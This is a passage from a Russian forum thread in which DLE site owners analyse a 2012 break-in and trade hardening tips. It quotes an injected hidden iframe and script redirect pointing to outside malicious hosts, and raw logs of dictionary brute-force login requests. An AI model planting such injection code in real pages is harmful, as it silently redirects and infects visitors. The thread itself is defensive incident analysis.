"POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:33 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:34 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:34 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:34 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:34 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:34 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:35 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:33 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:33 +0400] "POST http://домен/" 200 32572 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:35 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:36 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:37 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:37 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:37 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:37 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:39 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:39 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:41 +0400] "POST http://домен/" 200 15681 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:42 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:42 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:42 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:42 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:43 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:43 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:43 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:43 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:43 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:44 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:45 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:46 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:46 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:46 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:46 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:46 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:47 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:48 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:48 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:48 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:48 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:48 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 35483 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:50 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:51 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32073 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [08/Dec/2012:11:47:49 +0400] "POST http://домен/" 200 32587 "-" "-" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:42 +0400] "GET http://домен/admin.php" 200 2410 "http://vseokonyah.ru/engine/ajax/templates.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:43 +0400] "POST http://домен/admin.php" 200 18928 "http://домен/admin.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:43 +0400] "GET http://домен/admin.php?mod=templates" 302 11933 "http://домен/admin.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:43 +0400] "GET http://домен/admin.php?mod=templates&user_hash=3c387f70565dba18d0ebecb1ae0eb487" 200 11933 "http://домен/admin.php?mod=templates" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:43 +0400] "POST http://домен/engine/ajax/templates.php" 200 31022 "http://домен/admin.php?mod=templates&user_hash=3c387f70565dba18d0ebecb1ae0eb487" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:44 +0400] "POST http://домен/engine/ajax/templates.php" 200 27 "http://домен/engine/ajax/templates.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 159.253.22.8 - - [10/Dec/2012:13:26:44 +0400] "GET http://домен/" 200 44911 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 IP адрес 95.141.41.2 тоже фигурировал в в логах и видно, что шел подбор паролей. Но у него так и не получилось зайти в админку. А вот 159.253.22.8 зашел и поменял шаблон main.tpl через встроенный редактор в админке. И вот тоже интересная строчка: 159.253.22.8 - - [10/Dec/2012:13:26:42 +0400] "GET http://домен/admin.php" 200 2410 "http://vseokonyah.ru/engine/ajax/templates.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 vseokonyah.ru - это не сайт моего клиента. Но сайт тоже взломан. В исходном коде можно увидеть мусор вроде: <!--x813n--><iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe> <script type="text/javascript"> <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://simple.ttds.ru/go.php?sid=9"; } //--> </script><!--/x813n--><!--x813n--><script type="text/javascript" src='http://in-disquise.com/jquery.js'></script> <script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n--> Цитата Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 (изменено) А кто мешает сделать следующее: 1- Переименовываем файл admin.php в любой другой, к примеру q5mjr39me4.php 2- В файл .htaccess после DirectoryIndex index.php вставляем следующее: <Files "q5mjr39me4.php"> Order Deny,Allow Deny from all Allow from 192.168.0.1 (ваш внешний IP адрес) </Files> 3- В админке DLE в настройке "Файл админпанели" вписываем q5mjr39me4.php Всё! Теперь в админку просто так не попасть, даже есть злоумышленник узнает ваш логин и пароль, если конечно не взломать доступ к ФТП, но это уже другая история. Изменено 11 декабря 2012 пользователем Mek Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 Mek, это актуально только в том случае, если пользователь заходит на сайт исключительно с одного и того же IP. Чаще всего IP разный, так как пользователь может заходить на свой сайт с разных точек планеты и IP будет меняться. И не стоит думать, что сайты взламывают исключительно через admin.php Цитата Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 Mek, это актуально только в том случае, если пользователь заходит на сайт исключительно с одного и того же IP. Чаще всего IP разный, так как пользователь может заходить на свой сайт с разных точек планеты и IP будет меняться. Да, это актуально только в случаи, когда один администратор и заходит в админку с определённых IP адресов. И не стоит думать, что сайты взламывают исключительно через admin.php Я так и не думаю. Но согласитесь, мой вариант один из больших шагов в сторону обеспечения безопасности своего сайта. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 Mek, конечно согласен. Но, к сожалению, не все так делают Цитата Ссылка на сообщение Поделиться на других сайтах
DimkaG 5 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 Все таки похоже это не руками делают а софтом... Цитата Ссылка на сообщение Поделиться на других сайтах
Apache.kiev.ua 8 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 Ещё один совет - кроме переноса файла админпанели, переключите авторизацию на сайте с использования логина на e-mail - тогда брутфорсить будет сложнее. У меня несколько сайтов на DLE домашнем веб-сервере, и по логам, пару из них постоянно пытаются брутфорсить. При этом, шлются пост-запросы на admin.php даже несмотря на то, что отдаётся 404-я ошибка, если файл админки был переименован. Для брутфорса бралось или что-то в духе "admin", "administrator", или логин пользователя на сайте. Пароли брались по словарю или перебирались последовательности букв и цифр. Вот кусок логов: ==85020a76============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:34 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 51 51 username=Apache&password=iloveyou&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --85020a76-- ==0bd3b86f============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:34 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 51 51 username=Apache&password=baseball&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bd3b86f-- ==5496db79============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:34 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 51 51 username=Apache&password=1a1a1a1b&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --5496db79-- ==d2aa1373============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:34 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 49 49 username=Apache&password=jordan&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2aa1373-- ==b92e9a4a============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:34 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 49 49 username=Apache&password=dragon&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --b92e9a4a-- ==188aa310============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:35 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 50 50 username=Apache&password=1234567&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --188aa310-- ==1d56ad07============================== Request: apache.kiev.ua 95.105.14.227 - - [11/Nov/2012:13:27:35 +0200] "POST /admin.php HTTP/1.0" 404 406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" - "-" Handler: fcgid-script ---------------------------------------- POST /admin.php HTTP/1.0 X-Real-IP: 95.105.14.227 Host: apache.kiev.ua X-Forwarded-For: 95.105.14.227 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: identity Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Content-Length: 49 49 username=Apache&password=qwerty&subaction=dologin HTTP/1.1 404 Not Found Vary: Accept-Encoding Content-Length: 406 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d56ad07-- Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 986 Опубликовано: 11 декабря 2012 Рассказать Опубликовано: 11 декабря 2012 159.253.22.8 - - [10/Dec/2012:13:26:42 +0400] "GET http://домен/admin.php" 200 2410 "http://vseokonyah.ru/engine/ajax/templates.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 (.NET CLR 3.5.30729)" 127.0.0.6 vseokonyah.ru - это не сайт моего клиента. Но сайт тоже взломан. В исходном коде можно увидеть мусор вроде: Вторым адресом в логах идет реферал, т.е. предыдущий адрес где был злоумышленник, прежде чем перейти на вашу страницу. Т.е. данная строка говорит о том что человек редактировал шаблон на сайте vseokonyah.ru потом перешел на ваш сайт, где далее ввел пароль и приступил к редактированию вашего сайта. Как правило это работает просто, создается скрипт бот, в который вбиваются уже данные из известных логинов и паролей, а дальше робот поочередно обходит сайты, авторизуется под админскими данными и изменяет шаблоны. Такие боты просты, и работают только если уже известны администраторские данные для входа на сайт. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.